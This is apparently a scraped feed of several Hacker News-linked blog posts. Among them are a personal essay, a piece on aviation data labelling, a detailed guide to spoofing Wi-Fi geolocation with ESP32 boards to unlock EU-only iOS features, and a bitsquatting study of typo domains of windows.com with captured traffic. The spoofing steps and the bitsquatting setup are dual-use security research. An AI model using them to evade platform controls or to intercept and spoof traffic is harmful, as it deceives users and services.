    I hate finishing book series, games, shows, movies, chores, etc. I hate it so much, I don't even start them a lot of the time. After nearly a decade in therapy, with this being a central recurring theme, I've decided to finally finish it.

    Why do I hate the end?

    I have a few theories, but I'm not sure at the time I'm writing this sentence if any of them are true.

    Hypothesis #1: I have finished everything, Now I have nothing to do. Why do I exist?

    Fuck... right out of the gate, existential dread. This is a real-time writing, I don't know the next word I'm going to type until I'm typing it. Does this feel true, though?

    If I 100% Skyrim (main and all side quests), would the game be re-playable? I honestly don't know. I would lose one of my favorite games if I learned everything (why I hate spoilers as well). I could see replaying some aspects, but unless I decide to go questless and just openworld it, the game would lose novelty and no longer be fun. I know the outcome.

    BUT - I have reread Harry Potter four or five times. So, that was re-readable, so Skyrim should be re-playable? I've replayed Skyrim dozens of time from the start, as well, but I usually get bored so I will add something to my requirements (no range or alteration only or something dumb like no foraging, everything has to be given or bought), and that aids in it until I forget, then one break of my rules makes that save unplayable again.

    This seems plausible.

    Hypothesis #2: Nothing is ever done, so how can you finish, and if you can't finish something, why keep going?

    Ooof, this one hits even closer to home. One of the many projects I'm working on is to learn all this newfangled AI stuff, but using LLMs and SLMs to build things beyond a chatbot... but also a chatbot. I haven't written about it because "it's not done and it keeps changing" but it is called DreamEngine - a "game engine" in C# that uses the OpenAI API (with structured output and tool calling) to let you build a simple game that uses a compatible LLM for your "game logic." It is a really fun project. I enjoy playing with it a lot actually, one of the most fun I've had on a side project in a long time, but every time I think I'm done, I realize how much more I have left, and it kills my momentum.

    I call this the False Summit (I'm sure I didn't invent this). Any hikers or climbers out there know this problem well. I think I will even use this as the title for this post.

    When you think you are mere moments from summiting your Everest (or Pikes Peak, or Enchanted Rock, or DreamEngine), then another peak pops into view over the ridge you just crested. Your legs quiver, your body feels a new level of soreness.

    That is how I feel each time I play with DreamEngine. I write a small game in it "A Trolley Through Time" (a game where each turn is a new decade from the 1850s until 2020s, and you have to chose which historic figure gets crushed on the tracks, altering history) - Really fun to play, the reason I built Dream Engine. Everything is great.

    Then I think to myself, well what about a more open ended RPG game. As I create the game, I realize I needed to add Tool calling, so that was my first false summit. And sense the engine code was pretty coupled to the game, I had to extract it, and make it more generic - another summit. Then I realized the RPG needed more complex structured output than a simple single-layer JSON object - another summit.

    Each summit swipes 1 energy from your max, after so many of them, you can't even regain enough energy to continue, and you are now camping.

    Hypothesis #3: ADHD?

    Almost everyone I know has been diagnosed with ADHD. I have watched their lives get turned around by the proper dosing of meth. They do more and are more productive, but all the ADHD symptoms are still there. Also, I don't have problem finishing work if it is REAL work, and I'm getting paid for it.

    I've always dismissed having ADHD because I'm an incredibly productive software developer... at work. I close more tickets, produce less bugs, finish things in a week that another developer will take months on. I am not a 10x or anything like that, I just work in corporate America where the expectations are way lower, and I hate doing nothing. So while on the clock, I work and finish things.

    That has always told me I don't have ADHD, but I'm now wondering, as I get older, I do find myself being more easily distracted. I used to be able to sit at my desk for up to 72 hours (only leaving for bathroom breaks or the vending machine) until I was DONE with something, but now I find myself getting up just to pace every hour or so. Also I used to use YouTube as background noise, and now I catch myself watching YouTube not just listening.

    I am kind of wondering if maybe I do have ADHD, I was just able to utilize it in my youth where as now, I'm actively having to fight against it.

    So WTF is it?

    At the risk of sounding cliché, all of them? They each make sense to describe a portion of whatever prevents me from finishing things. I still cry at the end of Harry Potter, not because anyone dies, or because anything particularly emotional happens (it does, of course), but because it is over, and rereading it will take me multiple months with the amount of time I have allocated to read, so that is sad. I hate watching Michael Scott move to Colorado, not because it is sad (though it is), but because the Office is over (and we all know it).

    I hate thinking I'm almost done with something, then realize I'm no where close. And at work a defined scope makes that easier to deal with, but on a personal project without a PM and a BA managing scope, there is no scope, and when there is no scope, there is never an end. In hiking, I actually like false summits though, because I also hate ending my hike (ties back to #1).

    And, I'm starting to think I have ADHD... and that is what allowed me to hyperfocus on a work task until it was done in my youth, because everything back then was novel, and now that I've done everything (a corporate developer would ever do), the lack of novelty makes it hard to sit for more than a couple of hours without needing a mental break (or having one).

    Is there a solution?

    Maybe? I don't know.

    One could say finishing something might be exposure therapy, do it enough and reframe it as a success and not a loss.

    Possibly creating some coping mechanisms like actually scoping a personal project, and releasing in smaller chunks, so I'm constantly finishing something... that would feed into the exposure therapy.

    For ADHD, there are a lot of coping mechanisms for unmedicated success. ADHD workbooks exist, but everyone is different, and we all have different motivations, so finding the thing that motivates you is what would lead to the most success.

    What about you, reader?

    Does this resonate with you? Do you have similar struggles?

    ]]>
    https://jeremyaboyd.com/post/the-false-summit hacker-news-small-sites-43197514 Thu, 27 Feb 2025 19:20:19 GMT
    <![CDATA[Who Did the Work?]]> thread link) | @jger15
    February 27, 2025 | https://quarter--mile.com/Who-Did-The-Work | archive.org

    Unable to extract article]]>
    https://quarter--mile.com/Who-Did-The-Work hacker-news-small-sites-43197447 Thu, 27 Feb 2025 19:12:55 GMT
    <![CDATA[Our data labelling was too complex to outsource]]> thread link) | @EricButton
    February 27, 2025 | https://www.ericbutton.co/p/data-labelling | archive.org

    At Enhanced Radar, we’ve developed Yeager, a SOTA model that understands air traffic control audio, and we continue to develop other AI models for aviation applications. Due to the industry-specific technical complexity of our data, we could not possibly outsource this labelling effort to a third party and still meet our quality standards, forcing us to label our data in-house.

    Looking back, our decision to control our own labelling was vindicated at every step. The iterative process of building our labelling engine was the result of 1:1 relationships with our hundreds of (domain expert) reviewers, thousands of emails, and dozens of internal product updates, that now allow us to label a huge volume of messy data at a high degree of standardization and near-perfect accuracy — all with minimal intervention.

    Obvious but necessary: to incentivize productive work, we tie compensation to the number of characters transcribed, and assess financial penalties for failed tests (more on tests below). Penalties are priced such that subpar performance will result in little to no earnings for the labeller.

    Speed translates to cost savings, so we optimize for it at the expense of aesthetics. The interface presents the user with a single audio clip, pre-transcribed by one of our models.

    All text in the text area is forced-uppercase, freeing the user from making judgements on capitalization, or reaching for the shift key.

    All buttons in the dashboard are given (and labelled with) a keyboard shortcut, and the critical ones are oversized, color-coded, and placed directly below the text field.

    An audio waveform and playhead is shown, allowing the user to quickly replay specific parts of a clip he may have questions about. Clicking on the waveform will cause the clip to start playing even if the audio has been paused.

    Subsequent audio clips are pre-fetched, allowing a new clip to load instantly after the previous one is submitted.

    Every effort at gamification has been rewarded beyond our expectations. (Don’t assume that someone who’s intelligent and self-motivated still doesn’t respond to stimuli.)

    All of our contractors are skilled and most have well-paying day jobs, resulting in their time on the platform carrying a higher opportunity cost than most data labellers’. For this reason we designed every aspect of the platform to treat the users with respect. We address our labellers as “reviewers,” which more accurately describes the high-skill process they’re tasked with. We also take care to never make a rule, give an instruction, penalize a user, or push a platform update without thoroughly explaining the “why” behind it — doing otherwise would be disrespectful.

    To maximize gamification and to give us future flexibility for adjusting our payscale, reviewers earn points which are convertible to dollars at an agreed-upon rate. One point is earned for every character transcribed. For the average clip, a reviewer will earn approximately 50 points, which we add to a running tally at the top of the interface. We animate this number increase using Odometer, and display dollar earnings next to the points tally.

    Each reviewer is tested for accuracy at random. For every test passed, the user is shown a shower of confetti; for every failed test, the user is shown a text diff to help them correct their failed test.

    The reviewer’s accuracy is shown at the top of the interface, and updates in real-time. To encourage speedy remediation, the accuracy shown is calculated from just their last 200 tests.

    New reviewers are given a 1000-point credit to start; this helps them avoid seeing negative points (and negative earnings) in case they fail several tests in their first minutes of using the platform, and increases Day 1 retention.

    Reviewers are paid weekly, to tighten the feedback loop between effort and reward.

    Our first challenge was maintaining labeller performance.

    Every reviewer is presented with a number of test clips, ranging from 10-30% of the clips they see, based on their accuracy track record. Failing a test will cost a user 600 points, or roughly the equivalent of 15 minutes of work on the platform. A correctly tuned penalty system removes the need for setting reviewer accuracy minimums; poor performers will simply not earn enough money to continue on the platform.

    Due to the technical nature of our audio data, each of our labellers is required to have meaningful air navigation experience in U.S. airspace. All labellers are either licensed pilots or controllers (or VATSIM pilots/controllers).

    Still, expert reviewers will occasionally disagree in their labelling. To ensure quality, an audio clip ██████ ██████ ██ ██ ███████ █████████ █ ████ █████ ████ ████████ ███████ ███ █ ██ █████ ██ ███████, at which point that clip becomes a “candidate”. From there, this candidate clip is sent to a manager for final review. Managers are reviewers with a track-record for exceptional judgement, who can change the status of a clip from “candidate” to “final”.

    Finalized clips are then ready for use in AI training, but are also used as test clips. As each normal audio clip is presented to the user with an AI-generated “pre-transcription,” test clips must be disguised by showing an imperfect transcript for the user to correct. For every test, we use a small LLM to generate a slightly “wrong” transcript to present to the user.

    To maintain reviewer trust, we allow users to “dispute” a failed test and provide a one-sentence explanation for their reasoning. This dispute is viewed by a manager, who can choose to accept the dispute, reject it, or classify as ambiguous. For accepted or ambiguous disputes, the reviewer’s point penalty is reversed and that reviewer is notified in their dashboard. Clips where two domain experts can be reasonably expected to disagree on their interpretation are marked as “ambiguous”; these are removed from the test pool, and can be deleted from the training set entirely if the ambiguity risks adding noise to our dataset.

    Conveniently, the “dispute a failed test” functionality also doubles as the nth set of eyes on a given audio clip. Disputed clips are sent to a qualified manager for a final decision. As we add new data sources, reviewer disputes give us critical feedback on standardizations to implement; often, a new airport environment introduces a number of rare-but-critical phrases or words that we must standardize or add to our spell-check/grammar-check.

    Manager quality is measured independently, on several metrics.

    Standardization of interpretation of the speech is critical for model performance, and for fairly measuring each reviewer’s accuracy. While our reviewer vetting, training, and guidelines do most of the work, we still customize our UI for this.

    Reviewers are unable to submit a transcript containing a known spelling or grammatical error. We use a spell-check customized for aviation communications (an off-the-shelf spell-check would reject “DUYET,” a real navigational fix just southeast of SFO, for example). Similarly, we customize our spell check to accept only one version of words that can be spelled correctly in multiple ways, such as “all right” / “alright,” or “OK” / “okay.”

    Reviewers who fail a test are required to fix and re-submit their answer, to reinforce their understanding of our standards.

    A large percentage of aviation communications reference proper nouns, such as “JetBlue 2313,” “LAAYK” (a navigational fix), or “runway one six right.” Further, many navigational fixes are made-up words whose spelling often can’t be derived from their pronunciation. Callsigns present a similar issue (Air France’s call sign is “AIRFRANS,” for example).

    To address this we collect airspace metadata at the time of audio capture, including the callsigns of all nearby aircraft, the names of all nearby navigational aids, and the runway configuration for terminal area audio data. We present this data below the transcript so the reviewer can verify the spelling of these words.

    As we continue to develop the best AI models for aviation command & control, we’re only accelerating our effort in building the things that build the things for us. Recently we’ve built a lot more to improve our labelling and the fidelity of our annotation, but we’ll discuss that a year or two from now.

    One final thought: if you’re not a foundational AI research company and you can outsource your data labelling to anonymous gig workers on another continent, do you even have a data advantage? Do you have a Process Power advantage?

    ]]>
    https://www.ericbutton.co/p/data-labelling hacker-news-small-sites-43197248 Thu, 27 Feb 2025 18:53:44 GMT
    <![CDATA[Accessing region-locked iOS features, such as EU app stores]]> thread link) | @todsacerdoti
    February 27, 2025 | https://downrightnifty.me/blog/2025/02/27/eu-features-outside.html | archive.org

    The European Union's Digital Markets Act obligates Apple to provide certain features to iOS users in the EU, such as third party app stores. I live in the US and was able to develop a relatively-straightforward method to spoof your location on iOS and access these features, as well as any other region-locked iOS features you might be interested in experimenting with, even if you aren't in the required region.

    If you look at the reverse engineered documentation, it would seem to be difficult to fool Apple's countryd service, since it uses almost all available hardware radios to determine your location – GPS, Wi-Fi, Bluetooth, and cellular. However, Apple has developed a "priority" system, roughly ranking the relative reliability of each location determination method. Since Location Services has the highest priority value, if it returns a location result, the results from the other methods seem to be ignored. Location Services relies solely on GPS and nearby Wi-Fi access points if Airplane Mode is enabled (and Wi-Fi re-enabled). Therefore, if you can spoof Wi-Fi geolocation (or if you can spoof GPS), then you can access region-locked features from anywhere, even on the iPhone with its wide array of radios.

    On non-cellular iPad models, it has the potential to be even easier, because they only use Location Services (which can be disabled), or Wi-Fi country codes (which can be trivially spoofed). I was able to get this spoofing method working as well. However, it's not covered here.

    I tested this with:

    • 2 ESP32 units creating 25 spoofed networks each (total 50)
    • iOS 18.2.1 on an iPhone 15, and an iPad Mini 6th gen

    I was amazed at how consistent and reliable spoofing is, especially accounting for the low cost of the hardware involved and the simplicity of the spoofing software and method.

    Most of the work was already done by Lagrange Point and Adam Harvey, developer of the Skylift tool. I was inspired by Lagrange Point's article to experiment with this and to reproduce their results. Check out their article on enabling Hearing Aid mode on AirPods in unsupported regions!

    Please note that Apple could make the checks more difficult to bypass in the future through iOS updates. They don't have much of a reason to, since the current system is most likely more than sufficient to deter the average user from doing this, but it's very possible.

    Contents

    Procedure

    What you'll need

    • Some experience with the command line
    • An iOS/iPadOS device with a USB-C port (recent iPads, or iPhone 15+)
      • You might be able to make it work on a Lightning iPhone, but it's much easier with a USB-C port + hub
    • A USB-C hub with Ethernet, HDMI out, and several USB ports
    • A USB keyboard and mouse
    • A USB-C extension cable
    • A display with HDMI input
    • One or two "faraday pouches"; make sure one is large enough to hold your device, and if buying a second make sure it's large enough to hold the other one
      • Any other faraday cage setup allowing only the tip of a single USB-C cable to break through the cage will work too, but these pouches make it easy
      • In my testing, using two pouches did reduce the number of external Wi-Fi networks appearing on the Wi-Fi list to zero, but I was still able to make it work with only one pouch – WMMV
    • A router that you can install a VPN on
      • You'll need to plug the router directly in to the device via an Ethernet cable, so a secondary/portable router is preferred
    • Access to a VPN service with an option to place yourself in an EU country
    • One or more ESP32 dev modules (preferably at least two)
    • A small battery power supply for the ESP32 modules (a small USB power bank works)
    • A free WiGLE account

    These instructions assume you're using a Unix shell, so you might have to modify some of the commands slightly if you're on Windows.

    Preparing the router

    1. Install a VPN on your router placing you in your chosen target country.
    2. Select an EU member state supported by your VPN as a spoof target. I chose the Netherlands.

    Preparing the device

    Creating a secondary Apple ID

    You can't easily change the region on your Apple ID, and you probably don't want to do that anyway. But you can create a secondary Apple ID for use only while your device thinks that it's in the EU.

    1. Enable Airplane Mode and disable Bluetooth and Wi-Fi.
    2. Connect the device to the USB-C hub, and the USB-C hub to the router via Ethernet.
    3. Change your device region to your target country in Settings → General → Language & Region → Region.
    4. Sign out of your Apple ID: Settings → Your Account → Sign Out.
      • You'll need to sign out completely (including iCloud) in order to create a new account. Your data will not be lost. When you switch accounts again in the future, you only need to sign out of the App Store ("Media & Purchases"), not iCloud as well.
    5. Create a new Apple ID.
      • You can use the same phone number that's attached to your other Apple ID, or a Google Voice number.
      • For email, you'll need to either create an iCloud email, or use a "plus-style address".
    6. Make sure the Apple ID region is correct: App Store → Your Account → Your Account → Country/Region.
    7. Install at least one free app from the App Store to initialize the account.

    Getting Wi-Fi data

    1. Find a popular indoor public attraction offering free Wi-Fi within the target country using Google Maps or similar software. I chose the Rijksmuseum. Note down the GPS coordinates of the center of the building.
    2. Imagine a rectangle surrounding the building and note down the GPS coordinates of the top-left and bottom-right points.
    3. Create a free account on WiGLE.
    4. Query the WiGLE database using the online API interface with these parameters:
      1. latrange1: lesser of two latitudes you noted
      2. latrange2: greater of two latitudes you noted
      3. longrange1: lesser of two longitudes you noted
      4. longrange2: greater of two longitudes you noted
      5. closestLat: latitude of center of building
      6. closestLong: longitude of center of building
      7. resultsPerPage: 25*n where n is the number of ESP32 units you have (e.g. 50 for 2 units)
    5. Execute the request, then download the response as JSON
    6. Clone the skylift repository:
      git clone https://github.com/DownrightNifty/skylift
      
    7. Set up skylift:
      cd skylift/
      python3 -m venv .venv
      source .venv/bin/activate
      pip install -r requirements.txt
      pip install setuptools
      python setup.py develop
      
    8. Convert the JSON data to the format used by skylift:
      # replace $PATH_TO_JSON, $TARGET_LAT, and $TARGET_LONG
      python ./extras/wigle_to_skylift.py $PATH_TO_JSON ./w2s_out $TARGET_LAT $TARGET_LONG
      
    9. Create the arduino sketch(es):
      c=1
      for file in ./w2s_out/*; do
          skylift create-sketch -i "$file" -o ./out_"$c" --max-networks 25 --board esp32
          ((c++))
      done
      
    10. Use the Arduino IDE to upload each sketch to each ESP32 unit.

    Pre-generated Wi-Fi data

    If you're having trouble with acquiring the data yourself, you could try using the sample data that I generated. If a large number of people start using it, I don't know if it will continue to work indefinitely, so please use your own data if possible.

    The sample data can be found under the generated/ directory in my fork of Skylift.

    Placing the device in the faraday pouch

    1. Before you continue, check the device's settings:
      1. Enable Airplane Mode, disable Bluetooth, and re-enable Wi-Fi.
      2. [Optional] Disable your lock screen (this makes controlling the device externally easier).
      3. [Optional] Make sure Apple Maps is allowed to access your location "while using the app": Settings → Privacy & Security → Location Services → Maps. Required because ask-for-permission prompts annoyingly don't appear on external displays.
      4. [iPhone only] Enable AssistiveTouch: Settings → Accessibility → Touch → AssistiveTouch. Required to enable mouse support on iPhone.
      5. Make sure you're signed in to the App Store with the EU Apple ID you created earlier: Settings → Your Account → Media & Purchases. Signing in to iCloud as well is unnecessary.
    2. Connect the USB-C extension cable to the device.
    3. [⚠️ Important] Insulate the ESP32 units from the metallic faraday pouch using plastic bags or something.
    4. Connect the ESP32 units to the battery.
    5. Place the device into a faraday pouch, along with the ESP32 units and their battery. Seal it as well as possible with only the tip of the cable sticking out (reducing its ability to let in radio signals).
      • If one pouch doesn't work, try using two pouches (placing one inside the other)
    6. Connect the USB-C hub to the cable. Connect the router via Ethernet, and a keyboard, mouse, and display via HDMI.

    Spoofing location and unlocking EU features

    Your iOS device should now only see the spoofed Wi-Fi networks, and cannot receive a GPS signal. Since we have a cable sticking out, this isn't a perfect faraday cage and it's possible that especially strong signals such as cell signals will make their way through, but that's okay.

    1. Make sure that you can control the device inside the faraday pouch using the connected keyboard, mouse, and display, and that the device has internet access through Ethernet.
    2. [Optional] Check the nearby Wi-Fi list to make sure you can only see fake Wi-Fi networks.
      • If you see one or two nearby networks, that should still be okay; the geolocation service seems to ignore irregularities like this and returns the most likely location result, considering all nearby networks.
      • 5GHz Wi-Fi is stronger than 2.4GHz. You could temporarily disable 5GHz on your main router if that helps.
    3. Disable Location Services and then re-enable it.
    4. Open Apple Maps and check to make sure it places you inside your target country.
    5. You should now have access to EU features such as third party app stores. Try installing AltStore PAL at: https://altstore.io/download

    If it doesn't work the first time around, disable Location Services and re-enable it, then try again.

    Caveats

    "Third party app stores" != "sideloading"

    I've written at length about why third party app stores aren't the same as "sideloading". Check out my new project, "Does iOS have sideloading yet?", below!

    https://www.doesioshavesideloadingyet.com/

    The 30 day grace period

    Once you take your device out of the faraday pouch and it realizes that it's no longer in the EU, a 30-day grace period begins during which you can use EU features freely. After the grace period, certain features will become restricted. You'll still be able to use any apps from alternative app stores you downloaded, but they'll no longer receive updates.

    However, you can simply repeat the location spoof process again once each month, if you want to continue to access these features.

    Acknowledgements

    Appendix: Notes on Apple's Eligibility system

    Apple's Eligibility system has been mostly reverse engineered and documented, but I wanted to add some of my notes here for future reference.

    As noted in the Lagrange Point article, you can monitor the activity of the eligibility service by monitoring the device's system logs, either through Console.app on macOS, or libimobiledevice on other platforms. This command is especially helpful:

    idevicesyslog | grep RegulatoryDomain
    

    Here's a sample output:

    Here's the different location estimate methods, sorted by priority from lowest to highest:

    • WiFiAP (1): Uses the two-digit country codes of nearby Wi-Fi access points
    • ServingCellMCC (2): Uses the MCC code of the cell tower that the device is currently connected to(?)
    • NearbyCellsMCC (3): Uses the MCC codes of nearby cell towers
    • LatLonLocation (4): Uses coordinates from Location Services (GPS/Wi-Fi)

    According to the Apple Wiki article:

    countryd uses a mix of all signals to decide which country is the most likely physical location of the device.

    However, I found that, in practice, if conflicting information is available, countryd will simply use the estimate with the highest priorty.

    ]]>
    https://downrightnifty.me/blog/2025/02/27/eu-features-outside.html hacker-news-small-sites-43197163 Thu, 27 Feb 2025 18:45:18 GMT
    <![CDATA[Bitsquatting Windows.com]]> thread link) | @fanf2
    February 27, 2025 | https://remyhax.xyz/posts/bitsquatting-windows/ | archive.org

    Earlier this month, I came back around to seriously considering an attempt at bitsquatting. While the prior link goes into great depth on the topic, I will attempt to give a very high level overview here:

    If this sort of thing interests you: I tend to do stuff like this weekly. Give me a follow @_mattata

    When you try to access a site by it’s domain, that domain is stored in the memory of your computer, device, whatever… in a structure that looks something like this.

    01110111011010010110111001100100011011110111011101110011
    windows

    Now let’s say that the computer is running too hot, a solar flare is happening, or a cosmic ray (very real thing) flips a bit on the computer.

    01110111011010000110111001100100011011110111011101110011
    whndows

    Oh no! Now the value stored in memory is whndows.com instead of windows.com! When the time comes to make a connection to that domain, what happens?

    nslookup whndows.com

    *** can’t find whndows.com: Non-existent domain

    The domain doesn’t resolve to an IP!


    In fact, out of the 32 valid domain names that are 1-bitflip away from windows.com 14 were available for purchase! This is a rather odd occurance as usually these are bought up by a company like Microsoft to prevent their use for phishing attempts. So I bought them. All of them. For ~$126.

    (If you’re a verifiably responsible party, I’m more than happy to transfer ownership of the domains. Otherwise, I’ll just hold on to them and continue to sinkhole.)

    windnws.com windo7s.com windkws.com windmws.com winlows.com windgws.com wildows.com wintows.com wijdows.com wiodows.com wifdows.com whndows.com wkndows.com wmndows.com

    Now we need to point these domains somewhere. So I rent a VPS and configure IPv4/IPv6, and create wildcard DNS entries to point to them.

    Wildcard DNS works so that if I create a record saying that whndows.com points to 123.123.123.123 and someone requests abs.xyz.whndows.com, they will still get the same 123.123.123.123 DNS record as a reply. Due to the nature of this research dealing with bits being flipped, this allows me to capture any DNS lookup for a subdomain of windows.com where multiple bits have flipped.

    Once we have DNS configured, we use tshark to perform a packet capture on the public interface of our VPS and wait for something interesting to happen.

    Below is a short snippet of some interesting things that can be shared without uniquely indentifying any users.

    Usage of GreyNoise.io was key in helping to differentiate between opportunistic scanning and actual bitflip scenarios. Great product!

    NTP UDP port 123 time.windows.com

    UDP packets destined for port 123 attempting to set their computer clock using the Network Time Protocol (NTP). time.windows.com is the default NTP server configured for all Windows machines and they check for the time regularly. If they don’t succeed in getting the time, they try again, and again, and again.

    In total, over the course of 14 days, my server recieved 199,180 NTP Client connections from 626 unique IP addresses.

    The NTP client for windows OS has no inherent verification of authenticity, so there is nothing stopping a malicious person from telling all these computers that it’s after 03:14:07 on Tuesday, 19 January 2038 and wreaking unknown havoc as the memory storing the signed 32-bit integer for time overflows.

    As it turns out though, for ~30% of these computers doing that would make little to no difference at all to those users because their clock is already broken.

    Using the tshark filter “ntp.xmt” we can extract the Transmit Timestamp, which is the time that the computer thinks it is when it asks to update the time.

    tshark -r capture.pcap -T fields -e ntp.xmt -2 -R ntp.xmt | sort -u

    Sep 28, 1984 19:41:12.638290998 EDT
    Sep 28, 2012 11:59:42.976403314 EDT
    Sep 28, 2029 21:50:47.552079831 EDT
    Sep 28, 2100 18:13:09.180229791 EST
    Sep 29, 1975 08:36:52.200231052 EDT
    Sep 29, 1980 23:44:14.142299217 EDT
    Sep 29, 2036 11:54:11.410350275 EDT
    Sep 29, 2038 06:18:34.082394858 EDT
    Sep 29, 2046 16:00:00.102963544 EST
    Sep 29, 2050 06:39:18.880921186 EST
    Sep 29, 2074 07:31:58.701524704 EST
    Sep 30, 1999 00:29:32.120677896 EDT
    Sep 30, 2009 02:54:33.318870579 EDT
    Sep 30, 2049 00:14:59.396552253 EST
    Sep 30, 2075 13:56:14.492526678 EST
    Sep 30, 2081 01:56:58.477295064 EST
    

    HTTP TCP port 80 sg2p.w.s.windows.com

    No active DNS record exists for the correct domain sg2p.w.s.windows.com

    However, the User-Agent and timing of requests suggest that this activity is directly linked to the same application that generated the traffic shown below for client.wns.windows.com and skydrive.wns.windows.com

    GET / HTTP/1.1
    Host: sg2p.w.s.windo7s.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
    Accept: */*
    

    HTTP TCP port 80 client.wns.windows.com

    These appear to be directly related to Windows Push Notification Services (WNS) enable third-party developers to send toast, tile, badge, and raw updates from their own cloud service. DNS record is a CNAME to wns.notify.trafficmanager.net

    DNS Records:

    client.wns.windows.com.        IN    CNAME   wns.notify.trafficmanager.net.
    wns.notify.trafficmanager.net. IN    A       52.177.166.224
    

    HTTP Request:

    GET / HTTP/1.1
    Host: client.wns.wkndows.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
    Accept: */*
    

    HTTP TCP port 80 skydrive.wns.windows.com

    Skydrive is what OneDrive was called before it’s name change.

    DNS Records:

    skydrive.wns.windows.com.      IN      CNAME   client.wns.windows.com.
    client.wns.windows.com.        IN      CNAME   wns.notify.trafficmanager.net.
    wns.notify.trafficmanager.net. IN      A       52.179.224.121
    

    HTTP Request:

    GET / HTTP/1.1
    Host: skydrive.wns.windo7s.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
    Accept: */*
    

    HTTP TCP port 80 time.windows.com

    I have no idea where the hell this request came from or why they were fetching HTTP on a server that should be an NTP server. WHOIS for the IP that made this request shown below:

    inetnum:        123.112.0.0 - 123.127.255.255
    netname:        UNICOM-BJ
    descr:          China Unicom Beijing province network
    descr:          China Unicom
    country:        CN
    admin-c:        CH1302-AP
    tech-c:         SY21-AP
    mnt-by:         APNIC-HM
    mnt-lower:      MAINT-CNCGROUP-BJ
    mnt-routes:     MAINT-CNCGROUP-RR
    mnt-irt:        IRT-CU-CN
    
    GET / HTTP/1.1
    Host: time.wiodows.com
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
    Accept-Encoding: gzip
    Accept-Language: zh-cn,zh-tw
    Accept: */*
    

    Even stranger, shortly after the above request occurred, this happened! Baidu is one of China’s largest search engines. Keep in mind that I configured my DNS servers to resolve in wildcard mode. There is only a small number of ways Baiduspider could know that time.wiodows.com existed. Especially considering that only a single request had ever been made for this domain previously (seen above).

    GET / HTTP/1.1
    Host: time.wiodows.com
    Connection: close
    User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
    Accept-Encoding: gzip
    Accept-Language: zh-cn,zh-tw
    Accept: */*
    

    HTTP tcp port 80 windows.com/stopcode

    When you get a blue screen of death on Windows, you are prompted to visit https://www.windows.com/stopcode Naturally, as the computer has crashed, they can’t just open the link. Most people would probably just scan the QR code, but those who misspell things ended up here. stopcode)

    GET /stopcode HTTP/1.1
    Host: wildows.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; ALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.111 Mobile Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    

    The following request was particularly interesting. Due to the nature of the request, I’m going to be very general with some details or censor entirely because it’s not exactly clear what’s going on.

    An IP from somewhere in the range 113.96.0.0 - 113.111.255.255 (CHINANET-GD) makes a request from an android phone.

    GET /topode HTTP/1.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Linux; Android 7.1.2; M6 Note Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/77.0.3865.120 MQQBrowser/6.2 TBS/045223 Mobile Safari/537.36 MMWEBID/9551 MicroMessenger/7.0.14.1660(0x27000E37) Process/tools NetType/4G Language/zh_CN ABI/arm64 WeChat/arm64 wechatdevtools
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US
    Host: wintows.com
    Via: 1.1 TENCENT64.site (squid/3.5.20)
    X-Forwarded-For: <Department of Defence IP>
    Cache-Control: max-age=259200
    Connection: keep-alive
    

    It would appear the some user in China is using squid to inject HTTP headers in every request originating in their network, including their mobile phone. Their computer gets a BSOD, so they try to look up the stopcode at windows.com/stopcode on their phone. They mis-type the url and end up at my server where we can see that they’re injecting an HTTP header for X-Forwarded-For that attempts to make the request appear as if it originated from an IP belonging to the US Department of Defense.

    When I looked up the source IP on GreyNoise it showed that “This IP address has been opportunistically scanning the Internet, and has completed a full TCP connection. Reported activity could not be spoofed. This IP address has been observed by GreyNoise scanning the Internet on the following ports: 443 / TCP”

    Seeing as how my traffic was recieved on 80 / TCP, this seems like it may be something they did not intend to do.

    HTTP TCP port 80 windows.com/?fbclid

    As is expected, someone on Facebook is going to misspell windows.com which will create a link with a unique token ?fbclid=xyz. Facebook’s crawler will attempt to fetch it, and Bing will attempt to fetch it as well if it is in another language and translate it.

    GET /?fbclid=IwAR28VIBcDUlzO4XQOk9R-EWYLsnjUf-SrrKKZyAdOvrV2Mtv5JoJVO3PSUQ HTTP/1.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Host: wintows.com
    Connection: keep-alive
    

    It should come as no surprise the the NTP service that runs on all windows machines worldwide with a default configuration using time.windows.com generated the most bit-flipped traffic. I still got a lot of traffic for other items as well. I was most suprised by just how much traffic I got from domains that were misspelled by users when typing a URL.

    Takeaways:

    • Bitsquatting a largely trafficked domain is still very practical to pull off.
    • Automated services that are integrated into an OS create a lot of bitsquatted traffic.
    • Users still misspell domains, a lot.
    ]]>
    https://remyhax.xyz/posts/bitsquatting-windows/ hacker-news-small-sites-43197132 Thu, 27 Feb 2025 18:42:03 GMT
    <![CDATA[Building a Modern Data Stack: Our 70% Cost Reduction with Open Source]]> thread link) | @jchandra
    February 27, 2025 | http://jchandra.com/posts/data-infra/ | archive.org

